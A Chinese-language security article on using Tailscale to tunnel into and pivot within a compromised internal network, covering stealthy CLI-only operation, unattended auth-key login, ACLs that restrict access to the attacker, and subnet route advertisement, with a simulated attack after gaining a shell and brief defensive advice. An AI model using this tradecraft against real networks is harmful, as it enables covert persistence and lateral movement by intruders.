Tailscale在内网渗透中利用的研究
字数 1471 2025-08-25 22:58:35
Tailscale在内网渗透中的利用研究
一、Tailscale简介
Tailscale是一种基于WireGuard的多地组网软件,能够将多地主机聚合在一个虚拟局域网中,实现设备间的相互访问。所有节点采用P2P连接,具有以下特点:
- 杀软检测规避:作为正常组网工具,不易被查杀
- 流量隐蔽性:传输流量不易被安全设备识别
- 跨平台支持:支持Windows、Linux等多种操作系统
二、基础使用
1. 账户注册
- 访问官网 https://tailscale.com/
- 点击"Use Tailscale for free"进行注册
- 支持多种登录方式(Google、GitHub、Microsoft等)
2. 程序安装
Windows安装:
- 下载Windows版本安装包
- 默认安装路径:
C:\Program Files\Tailscale - 主程序:
tailscale-ipn.exe
Linux安装:
curl -fsSL https://tailscale.com/install.sh | sh
3. 设备接入
Windows设备接入:
- 运行
tailscale-ipn.exe - 点击"Log in"通过浏览器登录
- 登录成功后自动分配虚拟局域网IP
Linux设备接入:
tailscale up
访问生成的链接完成登录
三、内网渗透测试利用
1. 需要解决的问题
- 隐蔽性问题:图形界面暴露风险
- 登录问题:浏览器交互式登录不便
- 权限控制:双向访问风险
- 目标主机网段访问限制
2. 隐蔽性解决方案
命令行模式运行:
- 使用
tailscaled.exe作为服务tailscaled.exe - 使用
tailscale.exe命令行工具tailscale up
特点:
- 无图形界面显示
- 完全通过命令行操作
3. 登录问题解决方案
使用Auth Key:
- 在管理面板生成Auth Key
- Settings → Generate auth key
- 配置Auth Key属性:
- Reusable:是否可重复使用
- Expiration:过期时间
- Ephemeral:临时设备标记
- Tags:ACL策略标识
命令行登录:
sudo tailscale up --authkey [authkey]
4. 权限控制解决方案
ACL策略配置:
- 访问管理面板的"Access controls"标签
- 默认策略:允许所有访问
- 自定义策略示例:
表示只允许Kali(100.127.21.76)访问Windows(100.91.46.163){ "acls": [ {"action": "accept", "src": ["100.127.21.76"], "dst": ["100.91.46.163:*"]} ] }
5. 主机网段访问解决方案
子网路由配置:
Windows配置:
tailscale up --advertise-routes=10.0.0.0/24,10.0.1.0/24
Linux额外配置:
# 启用IP转发
echo 'net.ipv4.ip_forward = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
echo 'net.ipv6.conf.all.forwarding = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
sudo sysctl -p /etc/sysctl.d/99-tailscale.conf
# 广告路由
sudo tailscale up --advertise-routes=10.0.0.0/24,10.0.1.0/24
管理面板操作:
- 在设备列表中找到目标主机
- 点击"Edit route settings"
- 勾选需要开放的网段
四、攻击过程模拟
1. 文件上传
- 获取目标shell后上传必要文件:
tailscale.exetailscaled.exewintun.dll
2. 建立隧道
- 生成Auth Key并设置适当属性
- 目标主机执行:
tailscaled.exe tailscale.exe up --authkey [authkey] --unattended
3. 访问控制配置
- 在管理面板配置ACL策略
- 限制目标主机只能被特定IP访问
4. 内网渗透
- 识别目标内网其他网段
- 配置子网路由扩大访问范围
- 进行进一步渗透测试
五、防御建议
- 监控异常网络连接
- 限制未授权设备接入内网
- 定期审计网络配置
- 加强对合法管理工具的监控
六、参考资源
- Tailscale官方文档:https://tailscale.com/kb/
- GitHub issues:https://github.com/tailscale/tailscale/issues/6610
- 相关研究:Breaking the Barriers of Segmentation (pentera.io)
注意:本文仅用于安全研究目的,禁止用于未经授权的渗透测试行为。